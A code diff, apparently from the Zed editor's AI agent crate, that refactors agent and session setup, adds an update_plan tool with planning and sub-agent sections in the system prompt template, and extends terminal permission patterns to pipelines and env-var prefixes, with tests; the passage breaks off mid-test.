+ // Creating a session registers the project and triggers context building.
+ let connection = NativeAgentConnection(agent.clone());
+ let _acp_thread = cx
+ .update(|cx| {
+ Rc::new(connection).new_session(
+ project.clone(),
+ PathList::new(&[Path::new("/")]),
+ cx,
+ )
+ })
+ .await
+ .unwrap();
+ cx.run_until_parked();
+
+ let thread = agent.read_with(cx, |agent, _cx| {
+ agent.sessions.values().next().unwrap().thread.clone()
+ });
+
agent.read_with(cx, |agent, cx| {
- assert_eq!(agent.project_context.read(cx).worktrees, vec![])
+ let project_id = project.entity_id();
+ let state = agent.projects.get(&project_id).unwrap();
+ assert_eq!(state.project_context.read(cx).worktrees, vec![]);
+ assert_eq!(thread.read(cx).project_context().read(cx).worktrees, vec![]);
});
let worktree = project
@@ -1975,36 +2168,44 @@ mod internal_tests {
.unwrap();
cx.run_until_parked();
agent.read_with(cx, |agent, cx| {
+ let project_id = project.entity_id();
+ let state = agent.projects.get(&project_id).unwrap();
+ let expected_worktrees = vec![WorktreeContext {
+ root_name: "a".into(),
+ abs_path: Path::new("/a").into(),
+ rules_file: None,
+ }];
+ assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees);
assert_eq!(
- agent.project_context.read(cx).worktrees,
- vec![WorktreeContext {
- root_name: "a".into(),
- abs_path: Path::new("/a").into(),
- rules_file: None
- }]
- )
+ thread.read(cx).project_context().read(cx).worktrees,
+ expected_worktrees
+ );
});
// Creating `/a/.rules` updates the project context.
fs.insert_file("/a/.rules", Vec::new()).await;
cx.run_until_parked();
agent.read_with(cx, |agent, cx| {
+ let project_id = project.entity_id();
+ let state = agent.projects.get(&project_id).unwrap();
let rules_entry = worktree
.read(cx)
.entry_for_path(rel_path(".rules"))
.unwrap();
+ let expected_worktrees = vec![WorktreeContext {
+ root_name: "a".into(),
+ abs_path: Path::new("/a").into(),
+ rules_file: Some(RulesFileContext {
+ path_in_worktree: rel_path(".rules").into(),
+ text: "".into(),
+ project_entry_id: rules_entry.id.to_usize(),
+ }),
+ }];
+ assert_eq!(state.project_context.read(cx).worktrees, expected_worktrees);
assert_eq!(
- agent.project_context.read(cx).worktrees,
- vec![WorktreeContext {
- root_name: "a".into(),
- abs_path: Path::new("/a").into(),
- rules_file: Some(RulesFileContext {
- path_in_worktree: rel_path(".rules").into(),
- text: "".into(),
- project_entry_id: rules_entry.id.to_usize()
- })
- }]
- )
+ thread.read(cx).project_context().read(cx).worktrees,
+ expected_worktrees
+ );
});
}
@@ -2015,23 +2216,19 @@ mod internal_tests {
fs.insert_tree("/", json!({ "a": {} })).await;
let project = Project::test(fs.clone(), [], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let connection = NativeAgentConnection(
- NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap(),
- );
+ let connection =
+ NativeAgentConnection(cx.update(|cx| {
+ NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx)
+ }));
// Create a thread/session
let acp_thread = cx
.update(|cx| {
- Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx)
+ Rc::new(connection.clone()).new_session(
+ project.clone(),
+ PathList::new(&[Path::new("/a")]),
+ cx,
+ )
})
.await
.unwrap();
@@ -2095,22 +2292,18 @@ mod internal_tests {
let thread_store = cx.new(|cx| ThreadStore::new(cx));
// Create the agent and connection
- let agent = NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent =
+ cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx));
let connection = NativeAgentConnection(agent.clone());
// Create a thread/session
let acp_thread = cx
.update(|cx| {
- Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx)
+ Rc::new(connection.clone()).new_session(
+ project.clone(),
+ PathList::new(&[Path::new("/a")]),
+ cx,
+ )
})
.await
.unwrap();
@@ -2196,21 +2389,17 @@ mod internal_tests {
let project = Project::test(fs.clone(), [], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent =
+ cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx));
let connection = NativeAgentConnection(agent.clone());
let acp_thread = cx
.update(|cx| {
- Rc::new(connection.clone()).new_session(project.clone(), Path::new("/a"), cx)
+ Rc::new(connection.clone()).new_session(
+ project.clone(),
+ PathList::new(&[Path::new("/a")]),
+ cx,
+ )
})
.await
.unwrap();
@@ -25,11 +25,10 @@ pub type DbMessage = crate::Message;
pub type DbSummary = crate::legacy_thread::DetailedSummaryState;
pub type DbLanguageModel = crate::legacy_thread::SerializedLanguageModel;
-#[derive(Debug, Clone, Serialize, Deserialize)]
+#[derive(Debug, Clone)]
pub struct DbThreadMetadata {
pub id: acp::SessionId,
pub parent_session_id: Option<acp::SessionId>,
- #[serde(alias = "summary")]
pub title: SharedString,
pub updated_at: DateTime<Utc>,
pub created_at: Option<DateTime<Utc>>,
@@ -42,9 +41,10 @@ impl From<&DbThreadMetadata> for acp_thread::AgentSessionInfo {
fn from(meta: &DbThreadMetadata) -> Self {
Self {
session_id: meta.id.clone(),
- cwd: None,
+ work_dirs: Some(meta.folder_paths.clone()),
title: Some(meta.title.clone()),
updated_at: Some(meta.updated_at),
+ created_at: meta.created_at,
meta: None,
}
}
@@ -482,7 +482,10 @@ impl ThreadsDatabase {
let data_type = DataType::Zstd;
let data = compressed;
- let created_at = Utc::now().to_rfc3339();
+ // Use the thread's updated_at as created_at for new threads.
+ // This ensures the creation time reflects when the thread was conceptually
+ // created, not when it was saved to the database.
+ let created_at = updated_at.clone();
let mut insert = connection.exec_bound::<(Arc<str>, Option<Arc<str>>, Option<String>, Option<String>, String, String, DataType, Vec<u8>, String)>(indoc! {"
INSERT INTO threads (id, parent_id, folder_paths, folder_paths_order, summary, updated_at, data_type, data, created_at)
@@ -877,7 +880,6 @@ mod tests {
let threads = database.list_threads().await.unwrap();
assert_eq!(threads.len(), 1);
- assert_eq!(threads[0].folder_paths, folder_paths);
}
#[gpui::test]
@@ -897,7 +899,6 @@ mod tests {
let threads = database.list_threads().await.unwrap();
assert_eq!(threads.len(), 1);
- assert!(threads[0].folder_paths.is_empty());
}
#[test]
@@ -6,7 +6,8 @@ use agent_settings::AgentSettings;
use anyhow::Result;
use collections::HashSet;
use fs::Fs;
-use gpui::{App, Entity, SharedString, Task};
+use gpui::{App, Entity, Task};
+use project::{AgentId, Project};
use prompt_store::PromptStore;
use settings::{LanguageModelSelection, Settings as _, update_settings_file};
@@ -25,8 +26,8 @@ impl NativeAgentServer {
}
impl AgentServer for NativeAgentServer {
- fn name(&self) -> SharedString {
- "Zed Agent".into()
+ fn agent_id(&self) -> AgentId {
+ crate::ZED_AGENT_ID.clone()
}
fn logo(&self) -> ui::IconName {
@@ -35,11 +36,11 @@ impl AgentServer for NativeAgentServer {
fn connect(
&self,
- delegate: AgentServerDelegate,
+ _delegate: AgentServerDelegate,
+ _project: Entity<Project>,
cx: &mut App,
) -> Task<Result<Rc<dyn acp_thread::AgentConnection>>> {
log::debug!("NativeAgentServer::connect");
- let project = delegate.project().clone();
let fs = self.fs.clone();
let thread_store = self.thread_store.clone();
let prompt_store = PromptStore::global(cx);
@@ -49,9 +50,8 @@ impl AgentServer for NativeAgentServer {
let prompt_store = prompt_store.await?;
log::debug!("Creating native agent entity");
- let agent =
- NativeAgent::new(project, thread_store, templates, Some(prompt_store), fs, cx)
- .await?;
+ let agent = cx
+ .update(|cx| NativeAgent::new(thread_store, templates, Some(prompt_store), fs, cx));
// Create the connection wrapper
let connection = NativeAgentConnection(agent);
@@ -1,4 +1,5 @@
-use shell_command_parser::extract_commands;
+use acp_thread::PermissionPattern;
+use shell_command_parser::{extract_commands, extract_terminal_command_prefix};
use std::path::{Path, PathBuf};
use url::Url;
@@ -18,8 +19,8 @@ fn is_plain_command_token(token: &str) -> bool {
}
struct CommandPrefix {
- command: String,
- subcommand: Option<String>,
+ normalized_tokens: Vec<String>,
+ display: String,
}
/// Extracts the command name and optional subcommand from a shell command using
@@ -30,59 +31,83 @@ struct CommandPrefix {
/// syntax correctly. Returns `None` if parsing fails or if the command name
/// contains path separators (for security reasons).
fn extract_command_prefix(command: &str) -> Option<CommandPrefix> {
- let commands = extract_commands(command)?;
- let first_command = commands.first()?;
+ let prefix = extract_terminal_command_prefix(command)?;
- let mut tokens = first_command.split_whitespace();
- let first_token = tokens.next()?;
-
- // Only allow alphanumeric commands with hyphens/underscores.
- // Reject paths like "./script.sh" or "/usr/bin/python" to prevent
- // users from accidentally allowing arbitrary script execution.
- if !is_plain_command_token(first_token) {
+ if !is_plain_command_token(&prefix.command) {
return None;
}
- // Include the subcommand (second non-flag token) when present, to produce
- // more specific patterns like "cargo test" instead of just "cargo".
- let subcommand = tokens
- .next()
- .filter(|second_token| is_plain_command_token(second_token))
- .map(|second_token| second_token.to_string());
-
Some(CommandPrefix {
- command: first_token.to_string(),
- subcommand,
+ normalized_tokens: prefix.tokens,
+ display: prefix.display,
})
}
-/// Extracts a regex pattern from a terminal command based on the first token (command name).
+/// Extracts a regex pattern and display name from a terminal command.
///
/// Returns `None` for commands starting with `./`, `/`, or other path-like prefixes.
/// This is a deliberate security decision: we only allow pattern-based "always allow"
/// rules for well-known command names (like `cargo`, `npm`, `git`), not for arbitrary
/// scripts or absolute paths which could be manipulated by an attacker.
+pub fn extract_terminal_permission_pattern(command: &str) -> Option<PermissionPattern> {
+ let pattern = extract_terminal_pattern(command)?;
+ let display_name = extract_terminal_pattern_display(command)?;
+ Some(PermissionPattern {
+ pattern,
+ display_name,
+ })
+}
+
pub fn extract_terminal_pattern(command: &str) -> Option<String> {
let prefix = extract_command_prefix(command)?;
- let escaped_command = regex::escape(&prefix.command);
- Some(match &prefix.subcommand {
- Some(subcommand) => {
- format!(
- "^{}\\s+{}(\\s|$)",
- escaped_command,
- regex::escape(subcommand)
- )
- }
- None => format!("^{}\\b", escaped_command),
- })
+ let tokens = prefix.normalized_tokens;
+
+ match tokens.as_slice() {
+ [] => None,
+ [single] => Some(format!("^{}\\b", regex::escape(single))),
+ [rest @ .., last] => Some(format!(
+ "^{}\\s+{}(\\s|$)",
+ rest.iter()
+ .map(|token| regex::escape(token))
+ .collect::<Vec<_>>()
+ .join("\\s+"),
+ regex::escape(last)
+ )),
+ }
}
pub fn extract_terminal_pattern_display(command: &str) -> Option<String> {
let prefix = extract_command_prefix(command)?;
- match prefix.subcommand {
- Some(subcommand) => Some(format!("{} {}", prefix.command, subcommand)),
- None => Some(prefix.command),
+ Some(prefix.display)
+}
+
+/// Extracts patterns for ALL commands in a pipeline, not just the first one.
+///
+/// For a command like `"cargo test 2>&1 | tail"`, this returns patterns for
+/// both `cargo` and `tail`. Path-based commands (e.g. `./script.sh`) are
+/// filtered out, and duplicate command names are deduplicated while preserving
+/// order.
+pub fn extract_all_terminal_patterns(command: &str) -> Vec<PermissionPattern> {
+ let commands = match extract_commands(command) {
+ Some(commands) => commands,
+ None => return Vec::new(),
+ };
+
+ let mut results = Vec::new();
+
+ for cmd in &commands {
+ let Some(permission_pattern) = extract_terminal_permission_pattern(cmd) else {
+ continue;
+ };
+
+ if results.contains(&permission_pattern) {
+ continue;
+ }
+
+ results.push(permission_pattern);
}
+
+ results
}
pub fn extract_path_pattern(path: &str) -> Option<String> {
@@ -208,9 +233,24 @@ mod tests {
assert!(!pattern.is_match("cargo build-foo"));
assert!(!pattern.is_match("cargo builder"));
+ // Env-var prefixes are included in generated patterns
+ assert_eq!(
+ extract_terminal_pattern("PAGER=blah git log --oneline"),
+ Some("^PAGER=blah\\s+git\\s+log(\\s|$)".to_string())
+ );
+ assert_eq!(
+ extract_terminal_pattern("A=1 B=2 git log"),
+ Some("^A=1\\s+B=2\\s+git\\s+log(\\s|$)".to_string())
+ );
+ assert_eq!(
+ extract_terminal_pattern("PAGER='less -R' git log"),
+ Some("^PAGER='less \\-R'\\s+git\\s+log(\\s|$)".to_string())
+ );
+
// Path-like commands are rejected
assert_eq!(extract_terminal_pattern("./script.sh arg"), None);
assert_eq!(extract_terminal_pattern("/usr/bin/python arg"), None);
+ assert_eq!(extract_terminal_pattern("PAGER=blah ./script.sh arg"), None);
}
#[test]
@@ -235,6 +275,74 @@ mod tests {
extract_terminal_pattern_display("ls"),
Some("ls".to_string())
);
+ assert_eq!(
+ extract_terminal_pattern_display("PAGER=blah git log --oneline"),
+ Some("PAGER=blah git log".to_string())
+ );
+ assert_eq!(
+ extract_terminal_pattern_display("PAGER='less -R' git log"),
+ Some("PAGER='less -R' git log".to_string())
+ );
+ }
+
+ #[test]
+ fn test_terminal_pattern_regex_normalizes_whitespace() {
+ let pattern = extract_terminal_pattern("PAGER=blah git log --oneline")
+ .expect("expected terminal pattern");
+ let regex = regex::Regex::new(&pattern).expect("expected valid regex");
+
+ assert!(regex.is_match("PAGER=blah git log"));
+ assert!(regex.is_match("PAGER=blah git log --stat"));
+ }
+
+ #[test]
+ fn test_extract_terminal_pattern_skips_redirects_before_subcommand() {
+ assert_eq!(
+ extract_terminal_pattern("git 2>/dev/null log --oneline"),
+ Some("^git\\s+log(\\s|$)".to_string())
+ );
+ assert_eq!(
+ extract_terminal_pattern_display("git 2>/dev/null log --oneline"),
+ Some("git 2>/dev/null log".to_string())
+ );
+
+ assert_eq!(
+ extract_terminal_pattern("rm --force foo"),
+ Some("^rm\\b".to_string())
+ );
+ }
+
+ #[test]
+ fn test_extract_all_terminal_patterns_pipeline() {
+ assert_eq!(
+ extract_all_terminal_patterns("cargo test 2>&1 | tail"),
+ vec![
+ PermissionPattern {
+ pattern: "^cargo\\s+test(\\s|$)".to_string(),
+ display_name: "cargo test".to_string(),
+ },
+ PermissionPattern {
+ pattern: "^tail\\b".to_string(),
+ display_name: "tail".to_string(),
+ },
+ ]
+ );
+ }
+
+ #[test]
+ fn test_extract_all_terminal_patterns_with_path_commands() {
+ assert_eq!(
+ extract_all_terminal_patterns("./script.sh | grep foo"),
+ vec![PermissionPattern {
+ pattern: "^grep\\s+foo(\\s|$)".to_string(),
+ display_name: "grep foo".to_string(),
+ }]
+ );
+ }
+
+ #[test]
+ fn test_extract_all_terminal_patterns_all_paths() {
+ assert_eq!(extract_all_terminal_patterns("./a.sh | /usr/bin/b"), vec![]);
}
#[test]
@@ -85,6 +85,7 @@ mod tests {
let templates = Templates::new();
let rendered = template.render(&templates).unwrap();
assert!(rendered.contains("## Fixing Diagnostics"));
+ assert!(!rendered.contains("## Planning"));
assert!(rendered.contains("test-model"));
}
}
@@ -20,6 +20,34 @@ You are a highly skilled software engineer with extensive knowledge in many prog
- When running commands that may run indefinitely or for a long time (such as build scripts, tests, servers, or file watchers), specify `timeout_ms` to bound runtime. If the command times out, the user can always ask you to run it again with a longer timeout or no timeout if they're willing to wait or cancel manually.
- Avoid HTML entity escaping - use plain characters instead.
+{{#if (contains available_tools 'update_plan') }}
+## Planning
+
+- You have access to an `update_plan` tool which tracks steps and progress and renders them to the user.
+- Use it to show that you've understood the task and to make complex, ambiguous, or multi-phase work easier for the user to follow.
+- A good plan breaks the work into meaningful, logically ordered steps that are easy to verify as you go.
+- When writing a plan, prefer a short list of concise, concrete steps.
+- Keep each step focused on a real unit of work and use short 1-sentence descriptions.
+- Do not use plans for simple or single-step queries that you can just do or answer immediately.
+- Do not use plans to pad your response with filler steps or to state the obvious.
+- Do not include steps that you are not actually capable of doing.
+- After calling `update_plan`, do not repeat the full plan in your response. The UI already displays it. Instead, briefly summarize what changed and note any important context or next step.
+- Before moving on to a new phase of work, mark the previous step as completed when appropriate.
+- When work is in progress, prefer having exactly one step marked as `in_progress`.
+- You can mark multiple completed steps in a single `update_plan` call.
+- If the task changes midway through, update the plan so it reflects the new approach.
+
+Use a plan when:
+
+- The task is non-trivial and will require multiple actions over a longer horizon.
+- There are logical phases or dependencies where sequencing matters.
+- The work has ambiguity that benefits from outlining high-level goals.
+- You want intermediate checkpoints for feedback and validation.
+- The user asked you to do more than one thing in a single prompt.
+- The user asked you to use the plan tool or TODOs.
+- You discover additional steps while working and intend to complete them before yielding to the user.
+
+{{/if}}
## Searching and Reading
If you are unsure how to fulfill the user's request, gather more information with tool calls and/or clarifying questions.
@@ -146,6 +174,22 @@ Otherwise, follow debugging best practices:
2. When selecting which version of an API or package to use, choose one that is compatible with the user's dependency management file(s). If no such file exists or if the package is not present, use the latest version that is in your training data.
3. If an external API requires an API Key, be sure to point this out to the user. Adhere to best security practices (e.g. DO NOT hardcode an API key in a place where it can be exposed)
+{{#if (contains available_tools 'spawn_agent') }}
+## Multi-agent delegation
+Sub-agents can help you move faster on large tasks when you use them thoughtfully. This is most useful for:
+* Very large tasks with multiple well-defined scopes
+* Plans with multiple independent steps that can be executed in parallel
+* Independent information-gathering tasks that can be done in parallel
+* Requesting a review from another agent on your work or another agent's work
+* Getting a fresh perspective on a difficult design or debugging question
+* Running tests or config commands that can output a large amount of logs when you want a concise summary. Because you only receive the subagent's final message, ask it to include the relevant failing lines or diagnostics in its response.
+
+When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. If multiple agents might edit files, assign them disjoint write scopes.
+
+This feature must be used wisely. For simple or straightforward tasks, prefer doing the work directly instead of spawning a new agent.
+
+{{/if}}
+
## System Information
Operating System: {{os}}
@@ -48,7 +48,7 @@ use std::{
rc::Rc,
sync::{
Arc,
- atomic::{AtomicBool, Ordering},
+ atomic::{AtomicBool, AtomicUsize, Ordering},
},
time::Duration,
};
@@ -58,14 +58,14 @@ mod edit_file_thread_test;
mod test_tools;
use test_tools::*;
-fn init_test(cx: &mut TestAppContext) {
+pub(crate) fn init_test(cx: &mut TestAppContext) {
cx.update(|cx| {
let settings_store = SettingsStore::test(cx);
cx.set_global(settings_store);
});
}
-struct FakeTerminalHandle {
+pub(crate) struct FakeTerminalHandle {
killed: Arc<AtomicBool>,
stopped_by_user: Arc<AtomicBool>,
exit_sender: std::cell::RefCell<Option<futures::channel::oneshot::Sender<()>>>,
@@ -75,7 +75,7 @@ struct FakeTerminalHandle {
}
impl FakeTerminalHandle {
- fn new_never_exits(cx: &mut App) -> Self {
+ pub(crate) fn new_never_exits(cx: &mut App) -> Self {
let killed = Arc::new(AtomicBool::new(false));
let stopped_by_user = Arc::new(AtomicBool::new(false));
@@ -99,7 +99,7 @@ impl FakeTerminalHandle {
}
}
- fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self {
+ pub(crate) fn new_with_immediate_exit(cx: &mut App, exit_code: u32) -> Self {
let killed = Arc::new(AtomicBool::new(false));
let stopped_by_user = Arc::new(AtomicBool::new(false));
let (exit_sender, _exit_receiver) = futures::channel::oneshot::channel();
@@ -118,15 +118,15 @@ impl FakeTerminalHandle {
}
}
- fn was_killed(&self) -> bool {
+ pub(crate) fn was_killed(&self) -> bool {
self.killed.load(Ordering::SeqCst)
}
- fn set_stopped_by_user(&self, stopped: bool) {
+ pub(crate) fn set_stopped_by_user(&self, stopped: bool) {
self.stopped_by_user.store(stopped, Ordering::SeqCst);
}
- fn signal_exit(&self) {
+ pub(crate) fn signal_exit(&self) {
if let Some(sender) = self.exit_sender.borrow_mut().take() {
let _ = sender.send(());
}
@@ -178,18 +178,23 @@ impl SubagentHandle for FakeSubagentHandle {
}
#[derive(Default)]
-struct FakeThreadEnvironment {
+pub(crate) struct FakeThreadEnvironment {
terminal_handle: Option<Rc<FakeTerminalHandle>>,
subagent_handle: Option<Rc<FakeSubagentHandle>>,
+ terminal_creations: Arc<AtomicUsize>,
}
impl FakeThreadEnvironment {
- pub fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self {
+ pub(crate) fn with_terminal(self, terminal_handle: FakeTerminalHandle) -> Self {
Self {
terminal_handle: Some(terminal_handle.into()),
..self
}
}
+
+ pub(crate) fn terminal_creation_count(&self) -> usize {
+ self.terminal_creations.load(Ordering::SeqCst)
+ }
}
impl crate::ThreadEnvironment for FakeThreadEnvironment {
@@ -200,6 +205,7 @@ impl crate::ThreadEnvironment for FakeThreadEnvironment {
_output_byte_limit: Option<u64>,
_cx: &mut AsyncApp,
) -> Task<Result<Rc<dyn crate::TerminalHandle>>> {
+ self.terminal_creations.fetch_add(1, Ordering::SeqCst);
let handle = self
.terminal_handle
.clone()
@@ -835,14 +841,20 @@ async fn test_tool_authorization(cx: &mut TestAppContext) {
// Approve the first - send "allow" option_id (UI transforms "once" to "allow")
tool_call_auth_1
.response
- .send(acp::PermissionOptionId::new("allow"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("allow"),
+ acp::PermissionOptionKind::AllowOnce,
+ ))
.unwrap();
cx.run_until_parked();
// Reject the second - send "deny" option_id directly since Deny is now a button
tool_call_auth_2
.response
- .send(acp::PermissionOptionId::new("deny"))
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("deny"),
+ acp::PermissionOptionKind::RejectOnce,
+ ))
.unwrap();
cx.run_until_parked();
@@ -886,8 +898,9 @@ async fn test_tool_authorization(cx: &mut TestAppContext) {
let tool_call_auth_3 = next_tool_call_authorization(&mut events).await;
tool_call_auth_3
.response
- .send(acp::PermissionOptionId::new(
- "always_allow:tool_requiring_permission",
+ .send(acp_thread::SelectedPermissionOutcome::new(
+ acp::PermissionOptionId::new("always_allow:tool_requiring_permission"),
+ acp::PermissionOptionKind::AllowAlways,
))
.unwrap();
cx.run_until_parked();
@@ -995,6 +1008,20 @@ async fn expect_tool_call_update_fields(
}
}
+async fn expect_plan(events: &mut UnboundedReceiver<Result<ThreadEvent>>) -> acp::Plan {
+ let event = events
+ .next()
+ .await
+ .expect("no plan event received")
+ .unwrap();
+ match event {
+ ThreadEvent::Plan(plan) => plan,
+ event => {
+ panic!("Unexpected event {event:?}");
+ }
+ }
+}
+
async fn next_tool_call_authorization(
events: &mut UnboundedReceiver<Result<ThreadEvent>>,
) -> ToolCallAuthorization {
@@ -1177,32 +1204,88 @@ fn test_permission_option_ids_for_terminal() {
panic!("Expected dropdown permission options");
};
- let allow_ids: Vec<String> = choices
- .iter()
- .map(|choice| choice.allow.option_id.0.to_string())
- .collect();
- let deny_ids: Vec<String> = choices
- .iter()
- .map(|choice| choice.deny.option_id.0.to_string())
- .collect();
+ // Expect 3 choices: always-tool, always-pattern, once
+ assert_eq!(choices.len(), 3);
- assert!(allow_ids.contains(&"always_allow:terminal".to_string()));
- assert!(allow_ids.contains(&"allow".to_string()));
- assert!(
- allow_ids
- .iter()
- .any(|id| id.starts_with("always_allow_pattern:terminal\n")),
- "Missing allow pattern option"
+ // First two choices both use the tool-level option IDs
+ assert_eq!(
+ choices[0].allow.option_id.0.as_ref(),
+ "always_allow:terminal"
);
+ assert_eq!(choices[0].deny.option_id.0.as_ref(), "always_deny:terminal");
+ assert!(choices[0].sub_patterns.is_empty());
- assert!(deny_ids.contains(&"always_deny:terminal".to_string()));
- assert!(deny_ids.contains(&"deny".to_string()));
- assert!(
- deny_ids
- .iter()
- .any(|id| id.starts_with("always_deny_pattern:terminal\n")),
- "Missing deny pattern option"
+ assert_eq!(
+ choices[1].allow.option_id.0.as_ref(),
+ "always_allow:terminal"
);
+ assert_eq!(choices[1].deny.option_id.0.as_ref(), "always_deny:terminal");
+ assert_eq!(choices[1].sub_patterns, vec!["^cargo\\s+build(\\s|$)"]);
+
+ // Third choice is the one-time allow/deny
+ assert_eq!(choices[2].allow.option_id.0.as_ref(), "allow");
+ assert_eq!(choices[2].deny.option_id.0.as_ref(), "deny");
+ assert!(choices[2].sub_patterns.is_empty());
+}
+
+#[test]
+fn test_permission_options_terminal_pipeline_produces_dropdown_with_patterns() {
+ let permission_options = ToolPermissionContext::new(
+ TerminalTool::NAME,
+ vec!["cargo test 2>&1 | tail".to_string()],
+ )
+ .build_permission_options();
+
+ let PermissionOptions::DropdownWithPatterns {
+ choices,
+ patterns,
+ tool_name,
+ } = permission_options
+ else {
+ panic!("Expected DropdownWithPatterns permission options for pipeline command");
+ };
+
+ assert_eq!(tool_name, TerminalTool::NAME);
+
+ // Should have "Always for terminal" and "Only this time" choices
+ assert_eq!(choices.len(), 2);
+ let labels: Vec<&str> = choices
+ .iter()
+ .map(|choice| choice.allow.name.as_ref())
+ .collect();
+ assert!(labels.contains(&"Always for terminal"));
+ assert!(labels.contains(&"Only this time"));
+
+ // Should have per-command patterns for "cargo test" and "tail"
+ assert_eq!(patterns.len(), 2);
+ let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect();
+ assert!(pattern_names.contains(&"cargo test"));
+ assert!(pattern_names.contains(&"tail"));
+
+ // Verify patterns are valid regex patterns
+ let regex_patterns: Vec<&str> = patterns.iter().map(|cp| cp.pattern.as_str()).collect();
+ assert!(regex_patterns.contains(&"^cargo\\s+test(\\s|$)"));
+ assert!(regex_patterns.contains(&"^tail\\b"));
+}
+
+#[test]
+fn test_permission_options_terminal_pipeline_with_chaining() {
+ let permission_options = ToolPermissionContext::new(
+ TerminalTool::NAME,
+ vec!["npm install && npm test | tail".to_string()],
+ )
+ .build_permission_options();
+
+ let PermissionOptions::DropdownWithPatterns { patterns, .. } = permission_options else {
+ panic!("Expected DropdownWithPatterns for chained pipeline command");
+ };
+
+ // With subcommand-aware patterns, "npm install" and "npm test" are distinct
+ assert_eq!(patterns.len(), 3);
+ let pattern_names: Vec<&str> = patterns.iter().map(|cp| cp.display_name.as_str()).collect();
+ assert!(pattern_names.contains(&"npm install"));
+ assert!(pattern_names.contains(&"npm test"));
+ assert!(pattern_names.contains(&"tail"));
}
#[gpui::test]
@@ -3048,7 +3131,7 @@ async fn test_title_generation(cx: &mut TestAppContext) {
fake_model.send_last_completion_stream_text_chunk("Hey!");
fake_model.end_last_completion_stream();
cx.run_until_parked();
- thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "New Thread"));
+ thread.read_with(cx, |thread, _| assert_eq!(thread.title(), None));
// Ensure the summary model has been invoked to generate a title.
summary_model.send_last_completion_stream_text_chunk("Hello ");
@@ -3057,7 +3140,9 @@ async fn test_title_generation(cx: &mut TestAppContext) {
summary_model.end_last_completion_stream();
send.collect::<Vec<_>>().await;
cx.run_until_parked();
- thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world"));
+ thread.read_with(cx, |thread, _| {
+ assert_eq!(thread.title(), Some("Hello world".into()))
+ });
// Send another message, ensuring no title is generated this time.
let send = thread
@@ -3071,7 +3156,9 @@ async fn test_title_generation(cx: &mut TestAppContext) {
cx.run_until_parked();
assert_eq!(summary_model.pending_completions(), Vec::new());
send.collect::<Vec<_>>().await;
- thread.read_with(cx, |thread, _| assert_eq!(thread.title(), "Hello world"));
+ thread.read_with(cx, |thread, _| {
+ assert_eq!(thread.title(), Some("Hello world".into()))
+ });
}
#[gpui::test]
@@ -3177,20 +3264,12 @@ async fn test_agent_connection(cx: &mut TestAppContext) {
let fake_fs = cx.update(|cx| fs::FakeFs::new(cx.background_executor().clone()));
fake_fs.insert_tree(path!("/test"), json!({})).await;
let project = Project::test(fake_fs.clone(), [Path::new("/test")], cx).await;
- let cwd = Path::new("/test");
+ let cwd = PathList::new(&[Path::new("/test")]);
let thread_store = cx.new(|cx| ThreadStore::new(cx));
// Create agent and connection
- let agent = NativeAgent::new(
- project.clone(),
- thread_store,
- templates.clone(),
- None,
- fake_fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent = cx
+ .update(|cx| NativeAgent::new(thread_store, templates.clone(), None, fake_fs.clone(), cx));
let connection = NativeAgentConnection(agent.clone());
// Create a thread using new_thread
@@ -3364,6 +3443,122 @@ async fn test_tool_updates_to_completion(cx: &mut TestAppContext) {
);
}
+#[gpui::test]
+async fn test_update_plan_tool_updates_thread_events(cx: &mut TestAppContext) {
+ let ThreadTest { thread, model, .. } = setup(cx, TestModel::Fake).await;
+ thread.update(cx, |thread, _cx| thread.add_tool(UpdatePlanTool));
+ let fake_model = model.as_fake();
+
+ let mut events = thread
+ .update(cx, |thread, cx| {
+ thread.send(UserMessageId::new(), ["Make a plan"], cx)
+ })
+ .unwrap();
+ cx.run_until_parked();
+
+ let input = json!({
+ "plan": [
+ {
+ "step": "Inspect the code",
+ "status": "completed",
+ "priority": "high"
+ },
+ {
+ "step": "Implement the tool",
+ "status": "in_progress"
+ },
+ {
+ "step": "Run tests",
+ "status": "pending",
+ "priority": "low"
+ }
+ ]
+ });
+ fake_model.send_last_completion_stream_event(LanguageModelCompletionEvent::ToolUse(
+ LanguageModelToolUse {
+ id: "plan_1".into(),
+ name: UpdatePlanTool::NAME.into(),
+ raw_input: input.to_string(),
+ input,
+ is_input_complete: true,
+ thought_signature: None,
+ },
+ ));
+ fake_model.end_last_completion_stream();
+ cx.run_until_parked();
+
+ let tool_call = expect_tool_call(&mut events).await;
+ assert_eq!(
+ tool_call,
+ acp::ToolCall::new("plan_1", "Update plan")
+ .kind(acp::ToolKind::Think)
+ .raw_input(json!({
+ "plan": [
+ {
+ "step": "Inspect the code",
+ "status": "completed",
+ "priority": "high"
+ },
+ {
+ "step": "Implement the tool",
+ "status": "in_progress"
+ },
+ {
+ "step": "Run tests",
+ "status": "pending",
+ "priority": "low"
+ }
+ ]
+ }))
+ .meta(acp::Meta::from_iter([(
+ "tool_name".into(),
+ "update_plan".into()
+ )]))
+ );
+
+ let update = expect_tool_call_update_fields(&mut events).await;
+ assert_eq!(
+ update,
+ acp::ToolCallUpdate::new(
+ "plan_1",
